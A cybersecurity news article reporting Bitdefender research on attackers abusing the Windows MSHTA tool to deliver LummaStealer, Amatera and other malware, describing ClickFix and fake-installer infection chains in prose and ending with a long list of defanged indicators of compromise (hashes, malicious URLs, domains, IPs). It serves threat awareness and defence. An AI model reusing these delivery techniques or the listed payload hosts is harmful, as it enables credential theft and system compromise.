Hackers Abuse MSHTA Legacy Windows Tool to Deliver LummaStealer and Amatera Malware

HomeCyber Security News Hackers Abuse MSHTA Legacy Windows Tool to Deliver LummaStealer and Amatera Malware By Tushar Subhra Dutta May 20, 2026 Hackers are exploiting a decades-old Windows tool to deliver dangerous malware onto unsuspecting systems, with consequences ranging from stolen passwords to full system compromise. The tool is MSHTA, short for Microsoft HTML Application Host, a built-in Windows utility that can run scripts from local files and remote internet locations. Attackers have been using it to deliver some of today’s most harmful malware, including LummaStealer and Amatera. What makes MSHTA attractive to cybercriminals is its legitimacy. It is a signed Microsoft binary, meaning Windows trusts it by default, and that built-in trust is exactly what attackers exploit. Since the start of 2026, security teams have noticed a sharp rise in detections of mshta.exe in malicious infection chains. The fact that legitimate use of this tool is steadily declining makes the trend even more telling. Researchers at Bitdefender identified the growing abuse and traced multiple active campaigns relying on MSHTA. Bitdefender said in a report shared with Cyber Security News (CSN) that the activity spans a wide spectrum, from everyday password stealers to advanced threats capable of hiding on infected systems for long periods. The research was authored by senior software engineer Janos Gergo Szeles and published on May 19, 2026. Hackers Abuse MSHTA Legacy Windows Tool The campaigns observed cover several malware families, including LummaStealer, Amatera, ClipBanker, CountLoader, Emmenhtal Loader, and PurpleFox. All use MSHTA as a stepping stone during early or middle stages of infection. In some cases, MSHTA pulls a script from an attacker-controlled server, while in others it sits inside a longer chain involving phishing, fake software downloads, and ClickFix-style social engineering tricks. What makes the situation particularly serious is that MSHTA remains on Windows by default with no announced removal timeline. While Microsoft plans to fully disable VBScript from Windows by 2027, MSHTA stays an open door for attackers for the foreseeable future. One of the most active attack chains involves a loader called CountLoader, which uses MSHTA to deliver LummaStealer and Amatera. The infection starts when a victim downloads what appears to be free or cracked software. Inside the archive is a file called Setup.exe, which is actually a legitimate Python interpreter bundled with malicious scripts that quietly launch the attack in the background. Archive content with Python interpreter disguised as Setup.exe (Source – Bitdefender) As the Python script runs, it uses a renamed MSHTA copy disguised as iso2022.exe to connect to attacker servers and fetch the next-stage payload. Domains used in this campaign look like trusted services, such as google-services[.]cc and memory-scanner[.]cc, with the .cc top-level domain appearing repeatedly. The campaign peaked at the end of January 2026 before attackers shifted to .vg and .gl domains, including explorer[.]vg and ccleaner[.]gl. The final payload is most often LummaStealer, designed to harvest browser credentials, session cookies, and cryptocurrency wallet data. Amatera, another stealer in the same chain, targets similar data. Both can silently drain accounts and pass stolen information to criminals, often while victims remain completely unaware. ClickFix Social Engineering and the Emmenhtal Loader Chain A separate campaign uses a different trick to get MSHTA running on victim machines. Attackers send phishing messages on Discord linking to fake verification pages disguised as reCAPTCHA systems. When a user visits one of these pages, JavaScript secretly copies a malicious command to the clipboard and instructs them to press Win + R, paste it, and hit Enter. CountLoader killchain (Source – Bitdefender) That single action triggers MSHTA to fetch a remote script that runs entirely in memory, never touching the disk, helping it evade most file-based security tools. Inside are multiple encoded layers that eventually execute a PowerShell command, dropping LummaStealer as the final payload. Bitdefender recommends organizations move away from MSHTA in administrative workflows wherever possible and restrict or block binaries like mshta.exe where no longer needed. User education matters just as much, given how heavily these campaigns rely on tricking people into running commands they do not fully understand. A layered defense covering behavioral detection and runtime blocking remains the most effective way to stop these attacks before lasting damage is done. Indicators of Compromise (IoCs):– Emmenhtal Loader Type Indicator Description SHA256 AA845A8FB4AB38AEBE6A16A2A8F80CA4467AC0991D3EEF4D8A10BDF97DEDB1E9 Initial HTA launched after ClickFix SHA256 02630FA994B1566AD1515FD87220FC037B967F07495985A3637D68D7E08C57EE Obfuscated PowerShell SHA256 1E0E375F3EE82D5AF5DFE6F7DF0E2FAC9A7D37C67ADD3390D05A93AFD85B7C84 LummaStealer payload URL hxxp[://]185[.]147[.]124[.]40/Capcha[.]html Emmenhtal URL URL hxxp[://]92[.]255[.]57[.]155/Capcha[.]html Emmenhtal URL URL hxxps[://]denek[.]local-wanderer[.]shop/RIWZ[.]mp4 Emmenhtal URL URL hxxps[://]buck2nd[.]oss-eu-central-1[.]aliyuncs[.]com/dir/sixth/singl6[.]mp4 Emmenhtal URL URL hxxps[://]macphotoeditor[.]shop/singl5[.]mp4 Emmenhtal URL URL hxxps[://]topofsuper[.]shop/re5[.]mp4 Emmenhtal URL URL hxxps[://]antibot-check[.]icu/Capcha[.]html Emmenhtal URL URL hxxps[://]checkpageonce[.]com/singl6[.]mp4 Emmenhtal URL URL hxxps[://]echoicedeals[.]shop/s6[.]mp3 Emmenhtal URL URL hxxps[://]kizmond[.]shop/riiw1[.]mp4 Emmenhtal URL URL hxxps[://]klipjaqemiu[.]shop/web44[.]mp4 Emmenhtal URL URL hxxps[://]macphotoeditor[.]shop/singl6[.]mp4 Emmenhtal URL URL hxxps[://]onceletthemcheck[.]com/singl5[.]mp4 Emmenhtal URL URL hxxps[://]pawpaws[.]readit-carfanatics[.]com/madonna[.]mp4 Emmenhtal URL URL hxxps[://]propofgustestyle[.]info/recaptcha-verify[.]html Emmenhtal URL URL hxxps[://]recaptcha-process[.]com/recaptcha-verify[.]html Emmenhtal URL URL hxxps[://]retrosome[.]shop/ru2-2[.]eml Emmenhtal URL URL hxxps[://]savecoupons[.]store/s7[.]mp4 Emmenhtal URL URL hxxps[://]solve[.]gevaq[.]com/awjxs[.]captcha?u=a1bdaa0d-6aab-4d96-bafe-483ef5eb8cae Emmenhtal URL URL hxxps[://]solve[.]jenj[.]org/awjxs[.]captcha?u=8508de42-23ab-4b24-aa95-eda5feae86e8 Emmenhtal URL URL hxxps[://]thepremiumstuffs[.]shop/s5[.]mp4 Emmenhtal URL URL hxxps[://]triptrip[.]melody-wave[.]shop/re2[.]mp4 Emmenhtal URL URL hxxps[://]check[.]qlkwr[.]com/awjsx[.]captcha?u=03cb013e-aa4a-439e-86af-c3319c7b5dc0 Emmenhtal URL URL hxxps[://]driftcharm[.]shop/S6[.]mp4 Emmenhtal URL URL hxxps[://]etrademart[.]shop/s6[.]mp3 Emmenhtal URL URL hxxps[://]scrutinycheck[.]cash/singl5[.]mp4 Emmenhtal URL URL hxxps[://]simplerwebs[.]space/anrek[.]mp4 Emmenhtal URL URL hxxps[://]simplerwebs[.]world/mine[.]json Emmenhtal URL CountLoader / LummaStealer Domains Type Indicator Description Domain memory-scanner[.]cc CountLoader / LummaStealer infrastructure Domain fileless-market[.]cc CountLoader / LummaStealer infrastructure Domain hell1-kitty[.]cc CountLoader / LummaStealer infrastructure Domain holiday-forever[.]cc CountLoader / LummaStealer infrastructure Domain system-monitor[.]cc CountLoader / LummaStealer infrastructure Domain forest-entity[.]cc CountLoader / LummaStealer infrastructure Domain indeanapolice[.]cc CountLoader / LummaStealer infrastructure Domain files-storage[.]cc CountLoader / LummaStealer infrastructure Domain some-othertag[.]cc CountLoader / LummaStealer infrastructure Domain s3-updatehub[.]cc CountLoader / LummaStealer infrastructure Domain s3-microservice-updatehub[.]cc CountLoader / LummaStealer infrastructure Domain microservice-update-s2-bucket[.]cc CountLoader / LummaStealer infrastructure Domain parent-control[.]cc CountLoader / LummaStealer infrastructure Domain alphazero1-endscape[.]cc CountLoader / LummaStealer infrastructure Domain microservice-update-s1-bucket[.]cc CountLoader / LummaStealer infrastructure Domain globalsnn2-new[.]cc CountLoader / LummaStealer infrastructure Domain polystore9-servicebucket[.]cc CountLoader / LummaStealer infrastructure Domain hardware-office[.]cc CountLoader / LummaStealer infrastructure Domain immortal-service[.]cc CountLoader / LummaStealer infrastructure Domain globalsnn1-new[.]cc CountLoader / LummaStealer infrastructure Domain acio-patron[.]cc CountLoader / LummaStealer infrastructure Domain hell2-kitty[.]cc through hell10-kitty[.]cc CountLoader / LummaStealer infrastructure Domain alpha-centavr[.]cc CountLoader / LummaStealer infrastructure Domain azure-s3-bucket[.]cc CountLoader / LummaStealer infrastructure Domain hosting-control[.]cc CountLoader / LummaStealer infrastructure Domain communicationfirewall-security[.]cc CountLoader / LummaStealer infrastructure Domain domain-monitoring[.]cc CountLoader / LummaStealer infrastructure Domain network-defender[.]cc CountLoader / LummaStealer infrastructure Domain critical-service[.]cc CountLoader / LummaStealer infrastructure Domain google-services[.]cc CountLoader / LummaStealer infrastructure Domain offshore-storage[.]cc CountLoader / LummaStealer infrastructure Domain uruguvai[.]cc CountLoader / LummaStealer infrastructure Domain web3-walletnotify[.]cc CountLoader / LummaStealer infrastructure Domain debank-api[.]cc CountLoader / LummaStealer infrastructure Domain py-installer[.]cc CountLoader / LummaStealer infrastructure Domain memory-protection-layer1[.]cc CountLoader / LummaStealer infrastructure Domain s1-microservice-updatehub[.]cc through s10-microservice-updatehub[.]cc CountLoader / LummaStealer infrastructure Domain sentinel1-endpoint-security[.]cc CountLoader / LummaStealer infrastructure Domain fileless-storage-s3[.]cc CountLoader / LummaStealer infrastructure Domain ms-team-ping6[.]com CountLoader / LummaStealer infrastructure Domain holiday-updateservice[.]com CountLoader / LummaStealer infrastructure Domain health-smooth-eu2[.]com CountLoader / LummaStealer infrastructure Domain health-smooth-eu3[.]com CountLoader / LummaStealer infrastructure Domain bigbrainsholdings[.]com CountLoader / LummaStealer infrastructure Domain my-smart-house1[.]com CountLoader / LummaStealer infrastructure Domain explorer[.]vg New CountLoader infrastructure Domain ccleaner[.]gl New CountLoader infrastructure Domain microservice[.]gl New CountLoader infrastructure Domain geo-foundation[.]vg New CountLoader infrastructure Domain deluxe[.]gl New CountLoader infrastructure Domain silverhost[.]vg New CountLoader infrastructure Domain msgrouppolicy[.]vg New CountLoader infrastructure Domain holypriest[.]gl New CountLoader infrastructure Domain msedge[.]vg New CountLoader infrastructure ClipBanker Type Indicator Description SHA256 333E2192F2551415659FB4094E81B911708921BB588EECF65E27F51C9938DFC2 checking.ps1 SHA256 38FE562136ADE372FC4CEDDE67826AEEA8404E93A54A4A4736DDB4C8C8D4C96D ichigo-lite.ps1 SHA256 7D0487AFC91B0FE8B2FBF732AB54C3C07E86BF69471BBA6C283AABEA190499BA del.ps1 IP 185[.]208[.]159[.]199 IP hosting checking.ps1 IP 87[.]96[.]21[.]84 IP hosting further payloads URL hxxps[://]asq[.]d6shiiwz[.]pw/win/hssl/d6[.]hta HTA Loader URL hxxps[://]asd[.]s7610rir[.]pw/win/checking[.]hta HTA Loader URL hxxps[://]d1[.]pool4883[.]pw/win/hssl/r7[.]hta HTA Loader URL hxxp[://]us1[.]somepools555[.]pw/win/checking[.]hta HTA Loader PurpleFox Type Indicator Description IP 58[.]221[.]252[.]210 PurpleFox .msi location IP 60[.]173[.]116[.]152 PurpleFox .msi location IP 61[.]136[.]101[.]152 PurpleFox .msi location IP 61[.]147[.]108[.]92 PurpleFox .msi location IP 89[.]117[.]2[.]159 PurpleFox .msi location IP 100[.]1[.]121[.]27 PurpleFox .msi location IP 103[.]36[.]223[.]87 PurpleFox .msi location IP 103[.]55[.]70[.]212 PurpleFox .msi location IP 103[.]83[.]212[.]194 PurpleFox .msi location IP 103[.]115[.]17[.]90 PurpleFox .msi location IP 103[.]113[.]195[.]244 PurpleFox .msi location IP 107[.]175[.]187[.]11 PurpleFox .msi location IP 110[.]42[.]51[.]229 PurpleFox .msi location IP 110[.]45[.]196[.]155 PurpleFox .msi location IP 122[.]165[.]219[.]142 PurpleFox .msi location IP 156[.]224[.]232[.]98 PurpleFox .msi location IP 157[.]66[.]153[.]154 PurpleFox .msi location IP 173[.]208[.]166[.]226 PurpleFox .msi location IP 187[.]102[.]48[.]229 PurpleFox .msi location IP 190[.]111[.]12[.]242 PurpleFox .msi location IP 193[.]112[.]70[.]226 PurpleFox .msi location IP 201[.]138[.]238[.]195 PurpleFox .msi location IP 204[.]44[.]110[.]216 PurpleFox .msi location IP 222[.]73[.]29[.]92 PurpleFox .msi location Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM. Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google. Tags cyber security cyber security news Copy URL Linkedin Twitter ReddIt Telegram Tushar Subhra Dutta Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics. Trending News CISA Warns of Microsoft Exchange Server Vulnerability Exploited in Attacks Malware Campaign Uses JavaScript, PowerShell, and Shellcode to Deliver Crypto Clipper Critical SEPPmail Gateway Flaws Allow Remote Code Execution and Mail Traffic Theft macOS Malware Installs Fake Google Software Update LaunchAgent for Persistence Compromised GitHub Action Exfiltrates Workflow Credentials to Attacker Domain Latest News Cyber Security News Microsoft Releases Mitigation for Windows BitLocker Security Bypass 0-Day Vulnerability Cyber Security News New NGINX Vulnerability Allow Remote Attackers to Trigger Malicious Code Cyber Security News Fox Tempest Malware-Signing Service Abused Microsoft Artifact Signing to Certify Malware Cyber Attack News GitHub Hacked – Internal Source Code Repositories Compromised via Employee Device Cyber Security News PoC Exploit Released for 20-Year Old PostgreSQL RCE Vulnerability